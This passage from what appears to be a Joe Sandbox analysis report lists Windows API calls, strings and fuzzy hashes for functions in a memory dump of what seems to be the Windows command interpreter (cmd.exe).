                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00007FE7), ref: 0005CC6C
                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0005CCCB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                       • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                       • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$memset$ErrorLast$ConsoleTitle_wcsicmpiswspacetowupperwcsncmp
                                                                      • String ID:
                                                                      • API String ID: 4198873954-0
                                                                      • Opcode ID: 5b54ca96aea324e5a32555bc2e1ffb24ebcec0eeb355625317f17bed760a950d
                                                                      • Instruction ID: 622315a6fe6faaa43a367606ebd5b9d5dfc955d1ce74144d1b38f53d1a7a383b
                                                                      • Opcode Fuzzy Hash: 5b54ca96aea324e5a32555bc2e1ffb24ebcec0eeb355625317f17bed760a950d
                                                                      • Instruction Fuzzy Hash: 16B149F1B002158BDB74AB68CC957BF73A0EF01301F144079DD1A97691EB349D89C79A

                                                                       Control-flow Graph (function at 00051F1A; rendered graph and node/edge listing omitted)
                                                                      APIs
                                                                      • GetConsoleOutputCP.KERNELBASE(00050A41), ref: 00051F1A
                                                                      • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0007C9F0), ref: 00051F2B
                                                                      • memset.MSVCRT ref: 00051F45
                                                                      • GetThreadLocale.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 0005F185
                                                                      • memset.MSVCRT ref: 0005F1FB
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset$ConsoleInfoLocaleOutputThread
                                                                      • String ID:
                                                                      • API String ID: 1263632223-0
                                                                      • Opcode ID: 08413fa8627f8965f786c2217c5b5fc106c2042e0c39290696c0df0fd3caa87a
                                                                      • Instruction ID: f1991439594509abce895dc7cc0a6ffb12e50ed598eee4bb0fb38f4cfacb0be0
                                                                      • Opcode Fuzzy Hash: 08413fa8627f8965f786c2217c5b5fc106c2042e0c39290696c0df0fd3caa87a
                                                                      • Instruction Fuzzy Hash: 841106B1D182139AFBB05B14EC0EBB72B94A700302F48413EEED9A5195DB6C4489475E

                                                                      Control-flow Graph (rendered graph omitted; legend: Executed / Not Executed)
                                                                      control_flow_graph 883 4e3f0-4e403 884 4e405-4e41d call 56e25 883->884 885 4e45d 883->885 888 4e422-4e427 884->888 887 4e45f-4e463 885->887 889 4e42d-4e43b 888->889 890 5dc4a-5dc66 call 634d4 888->890 892 4e441-4e44f 889->892 893 5dc6b-5dc72 ??_V@YAXPAX@Z 889->893 890->887 895 4e466-4e468 892->895 896 4e451-4e45a memset 892->896 895->896 896->885
                                                                      APIs
                                                                      • memset.MSVCRT ref: 0004E455
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?,00045F21,-00000001), ref: 0005DC6C
                                                                      Strings
                                                                      • onecore\base\cmd\maxpathawarestring.cpp, xrefs: 0005DC57
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: onecore\base\cmd\maxpathawarestring.cpp
                                                                      • API String ID: 2221118986-3416068913
                                                                      • Opcode ID: 75fa4a4d9abd07e5f262c6a063e5d1718eef9d74fe4a33f46ddbee0d6c327abf
                                                                      • Instruction ID: 0c73dfd41237e9e5f53d7b2061adf20fbb233b93e1fb232accb0c2e256aa17e7
                                                                      • Opcode Fuzzy Hash: 75fa4a4d9abd07e5f262c6a063e5d1718eef9d74fe4a33f46ddbee0d6c327abf
                                                                      • Instruction Fuzzy Hash: EE01F5B1700344A7D7788624DC0AB6BB7C9EBC0351F10453EB95AC7241DAA6EC0082A5
                                                                      APIs
                                                                      • _callnewh.MSVCRT ref: 00057437
                                                                        • Part of subcall function 000574D1: ??0exception@@QAE@ABQBDH@Z.MSVCRT(000577EC,00000001), ref: 000574E7
                                                                      • malloc.MSVCRT ref: 00057444
                                                                      • _CxxThrowException.MSVCRT(?,0006CBF8), ref: 000577F5
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: ??0exception@@ExceptionThrow_callnewhmalloc
                                                                      • String ID:
                                                                      • API String ID: 813871643-0
                                                                      • Opcode ID: adbb71830d6593cdd830ff95bd9270507eb766e4b1a3336701d06a3bf27f23e0
                                                                      • Instruction ID: d22c9d404f4cc57dbff5ee0e4bce190832beae237f7e31422e347e6173137fed
                                                                      • Opcode Fuzzy Hash: adbb71830d6593cdd830ff95bd9270507eb766e4b1a3336701d06a3bf27f23e0
                                                                      • Instruction Fuzzy Hash: 86E0D83540C10DB78F206665FC09DEF3F6D5B40322B148465BD1D96452EF30D949F9D1
                                                                      APIs
                                                                      • memset.MSVCRT ref: 00045EFB
                                                                        • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
                                                                        • Part of subcall function 00048E9E: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,00088BF0,00000000,?), ref: 00048EC3
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BCA7
                                                                        • Part of subcall function 0004BC30: iswspace.MSVCRT ref: 0004BD1D
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD39
                                                                        • Part of subcall function 0004BC30: wcschr.MSVCRT ref: 0004BD5D
                                                                        • Part of subcall function 00050060: wcschr.MSVCRT ref: 0005006C
                                                                      • ??_V@YAXPAX@Z.MSVCRT(?), ref: 00045FF7
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: wcschr$memset$CurrentDirectoryiswspace
                                                                      • String ID:
                                                                      • API String ID: 4234405029-0
                                                                      • Opcode ID: 29351ef153f097518fb04155f64e0e1151bc7499564b9931b3ec447d7d36143d
                                                                      • Instruction ID: 5fa6b06402ab4296d8947e23499bc11b6d2119cc6ed198286c8cb9504b4148c9
                                                                      • Opcode Fuzzy Hash: 29351ef153f097518fb04155f64e0e1151bc7499564b9931b3ec447d7d36143d
                                                                      • Instruction Fuzzy Hash: B1A1B0B16083419BE768DB20C85967F77E5EF85301F04883EF88AC7291EB78D949CB56
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID: COMSPEC
                                                                      • API String ID: 2221118986-1631433037
                                                                      • Opcode ID: 7ba2d1021bd792f4e2e1ba9f92b7ced311a42168f81484bdb0e244ea4ce32dd1
                                                                      • Instruction ID: dc548e743ab976efe497fb89f5da73ab204329afe7745ed0824d80e5fd853b14
                                                                      • Opcode Fuzzy Hash: 7ba2d1021bd792f4e2e1ba9f92b7ced311a42168f81484bdb0e244ea4ce32dd1
                                                                      • Instruction Fuzzy Hash: 9041F7F0B04AC08BDBB46B28D95576E73C5BFD4748F14097AE90683292FA64DC44839F
                                                                      APIs
                                                                      • __EH_prolog3_catch.LIBCMT ref: 00056E37
                                                                        • Part of subcall function 0005742D: malloc.MSVCRT ref: 00057444
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog3_catchmalloc
                                                                      • String ID:
                                                                      • API String ID: 125873668-0
                                                                      • Opcode ID: 717ca51db1500f464121de397375ffb505e81a2bf6d2ac6b44e195e5bcf62e73
                                                                      • Instruction ID: ddc85e01682f29736e027ed22e7b0854d44017b7a33594b9daf39a7fbc39f268
                                                                      • Opcode Fuzzy Hash: 717ca51db1500f464121de397375ffb505e81a2bf6d2ac6b44e195e5bcf62e73
                                                                      • Instruction Fuzzy Hash: 2AC08C2D22D110D6CB803790F00379F2A10AB10B03F908004BC092A083DE79451C3B51
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: memset
                                                                      • String ID:
                                                                      • API String ID: 2221118986-0
                                                                      • Opcode ID: c7cf9a98dc1584943114782d0c303ac54ba92d830353226959649fadd31955bc
                                                                      • Instruction ID: 407618c5ee7a6c4e4857504ec7717705f890dad278163a737835d794b5999644
                                                                      • Opcode Fuzzy Hash: c7cf9a98dc1584943114782d0c303ac54ba92d830353226959649fadd31955bc
                                                                      • Instruction Fuzzy Hash: D7E0207774B2312BE12D54A4BC87F578B9DC7C0772F290035FE048B181D9D14C0842A4
                                                                      APIs
                                                                      • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,00000000,00000001), ref: 000641B9
                                                                      • _get_osfhandle.MSVCRT ref: 000641CA
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?), ref: 00064205
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 0006426C
                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00069E02,?,00000010), ref: 00064283
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 00064292
                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000642B1
                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 000642C4
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 000642D2
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 000642D9
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0006432F
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 00064336
                                                                      • _wcsnicmp.MSVCRT ref: 000643DB
                                                                      • _wcsnicmp.MSVCRT ref: 000643F0
                                                                      • _wcsnicmp.MSVCRT ref: 00064405
                                                                      • _wcsnicmp.MSVCRT ref: 0006441A
                                                                      • _wcsnicmp.MSVCRT ref: 0006442F
                                                                      • _wcsnicmp.MSVCRT ref: 00064444
                                                                      • _wcsnicmp.MSVCRT ref: 00064459
                                                                      • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?,?,?,00000001,?), ref: 000644A5
                                                                      • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,?), ref: 000644F0
                                                                      • FillConsoleOutputCharacterW.API-MS-WIN-CORE-CONSOLE-L2-1-0(?,00000020,?,?,?), ref: 00064506
                                                                      • WriteConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,?,?,00000000), ref: 0006451D
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 00064565
                                                                      • RtlFreeHeap.NTDLL(00000000), ref: 0006456C
                                                                      • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000001), ref: 00064595
                                                                      • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0006459C
                                                                      • AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000645C3
                                                                      • ReadConsoleW.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?,00069E02,?,00000000), ref: 000645D4
                                                                      • ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(00088E04), ref: 000645DD
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Heap$Console_wcsnicmp$LockProcessShared$Free$AcquireBufferCriticalInfoReadReleaseScreenSection$AllocCharacterCursorEnterFillHandleLeaveOutputPositionWrite_get_osfhandle
                                                                      • String ID: cd $chdir $md $mkdir $pushd $rd $rmdir
                                                                      • API String ID: 2991647268-3100821235
                                                                      • Opcode ID: 8e96a86005ba007806fe733d7c1c3c8149e9f92198ed1118fedb83ec4aee8676
                                                                      • Instruction ID: 6c3eb5822dc463f993414619f6d20b382c687585798eba9b7e4667fbdde932a9
                                                                      • Opcode Fuzzy Hash: 8e96a86005ba007806fe733d7c1c3c8149e9f92198ed1118fedb83ec4aee8676
                                                                      • Instruction Fuzzy Hash: 48C1E370604301AFEB209F64DC49A2FBBE6FF89714F04492DF996C62A1D779CA44CB12
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: [...]$ [..]$ [.]$...$:
                                                                      • API String ID: 0-1980097535
                                                                      • Opcode ID: 72530779a8b6be9bc474fe07c4fba1229b4dc9cc98c07d8826134ef6056f9bb5
                                                                      • Instruction ID: 184718481f7777fe2a0be1e05f43ed1b98fb23db2f831d11a2ae10723cd63450
                                                                      • Opcode Fuzzy Hash: 72530779a8b6be9bc474fe07c4fba1229b4dc9cc98c07d8826134ef6056f9bb5
                                                                      • Instruction Fuzzy Hash: A312D2B02083419BD764DF24C885AAFB7E9EF88345F00892DFD89D7291EB34D949CB56
                                                                      APIs
                                                                      • GetSystemTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,0006E590,?,00002000), ref: 00046896
                                                                      • SystemTimeToFileTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000468AA
                                                                      • FileTimeToLocalFileTime.API-MS-WIN-CORE-FILE-L1-1-0(?,?), ref: 000468BE
                                                                      • FileTimeToSystemTime.API-MS-WIN-CORE-TIMEZONE-L1-1-0(?,?), ref: 000468D2
                                                                      • realloc.MSVCRT ref: 0005A5E7
                                                                        • Part of subcall function 00048791: GetUserDefaultLCID.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00046906,0000001F,?,00000080), ref: 00048791
                                                                      • GetLocaleInfoW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0000001F,?,00000080), ref: 00046907
                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?), ref: 0004698F
                                                                      • memmove.MSVCRT(?,?,?), ref: 00046A86
                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000000), ref: 00046AAF
                                                                      • realloc.MSVCRT ref: 00046ACA
                                                                      • GetDateFormatW.API-MS-WIN-CORE-DATETIME-L1-1-0(00000000,00000000,?,?,00000000,00000001), ref: 00046AFE
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
                                                                      • Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
                                                                      • Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40000_alpha.jbxd
                                                                      Similarity
                                                                      • API ID: Time$File$DateFormatSystem$realloc$DefaultInfoLocalLocaleUsermemmove
                                                                      • String ID: %02d%s%02d%s%02d$%s $%s %s
                                                                      • API String ID: 2927284792-4023967598
APIs
• memset.MSVCRT ref: 00054F03
  • Part of subcall function 0004E3F0: memset.MSVCRT ref: 0004E455
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,-00000001), ref: 00054F67
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000001), ref: 00054F77
• FindFirstFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00042670,?,?,?,-00000001), ref: 00054FEB
• FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,-00000001), ref: 00055103
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,-00000001), ref: 0005511E
• ??_V@YAXPAX@Z.MSVCRT(?,-00000001), ref: 00055141
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: Find$File$CloseFirstmemset$Next
• String ID: \\?\
• API String ID: 3059144641-4282027825
APIs
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(73B29366,00000000,?), ref: 00067710
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067722
  • Part of subcall function 0004EC2E: GetEnvironmentVariableW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(?,0006E590,00002000,?,00088BF0,00000000,?,?,00048F0D), ref: 0004EC51
• towupper.MSVCRT ref: 000678BC
• LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 000679F1
• GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00041F8C,00043B98), ref: 00067B15
• EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,73B29366,00000000,?), ref: 00067D0D
• LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00067D20
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: CriticalSection$EnterLeave$DriveEnvironmentFreeLocalTypeVariabletowupper
• String ID: %s $%s>$PROMPT$Unknown
• API String ID: 708651206-3050974680
APIs
  • Part of subcall function 0006C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?), ref: 0006C14E
  • Part of subcall function 0006C135: SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000008,?,00000000,00000000,?), ref: 0006C16A
  • Part of subcall function 0006C135: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,?,?,00000000,00000000,?), ref: 0006C17B
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(40002749,00000001), ref: 0006C24F
• CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001), ref: 0006C270
• CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000001,00000000,00000003,02000000,00000000), ref: 0006C293
• RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 0006C2AE
• memset.MSVCRT ref: 0006C2EF
• memcpy.MSVCRT(?,?,?), ref: 0006C324
• memcpy.MSVCRT(?,00000000,?), ref: 0006C370
• NtFsControlFile.NTDLL(?,00000000,00000000,00000000,?,000900A4,?,?,00000000,00000000), ref: 0006C392
• RtlNtStatusToDosError.NTDLL ref: 0006C39D
• SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 0006C3A4
• CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(?), ref: 0006C3B6
• RtlFreeHeap.NTDLL(?,00000000,00000000), ref: 0006C3D1
• RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 0006C3E2
  • Part of subcall function 0006C5F2: memset.MSVCRT ref: 0006C62E
  • Part of subcall function 0006C5F2: memset.MSVCRT ref: 0006C656
  • Part of subcall function 0006C5F2: GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,-00000105,-00000105,?,?,?,00000001,00000000,00000000), ref: 0006C6C7
  • Part of subcall function 0006C5F2: GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,00000001,00000000,00000000), ref: 0006C6E6
  • Part of subcall function 0006C5F2: GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,00000000,00000000,?,?,?,00000001,?,?,?,00000001,00000000,00000000), ref: 0006C72A
Memory Dump Source
• Source File: 00000007.00000002.1592745887.0000000000041000.00000020.00000001.01000000.00000006.sdmp, Offset: 00040000, based on PE: true
• Associated: 00000007.00000002.1592729053.0000000000040000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592771799.000000000006E000.00000004.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008A000.00000002.00000001.01000000.00000006.sdmp
• Associated: 00000007.00000002.1592793117.000000000008E000.00000002.00000001.01000000.00000006.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_40000_alpha.jbxd
Similarity
• API ID: Path$ErrorName$Lastmemset$CreateDirectoryFileFullVolumememcpy$CloseControlDriveFreeHandleHeapInformationName_RemoveStatusType
• String ID:
• API String ID: 223857506-0
APIs
• FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000559D0,?,00046054,-00001038,00000000,?,?), ref: 000558BB
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000558CD
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000014,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00055944
• HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0005594B
• GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0005596C
• HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00055973
• FindNextFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0005598F
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000559B6
• GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 0006160B
• FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,?,000559D0,?,00046054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 00061618
Memory Dump Source
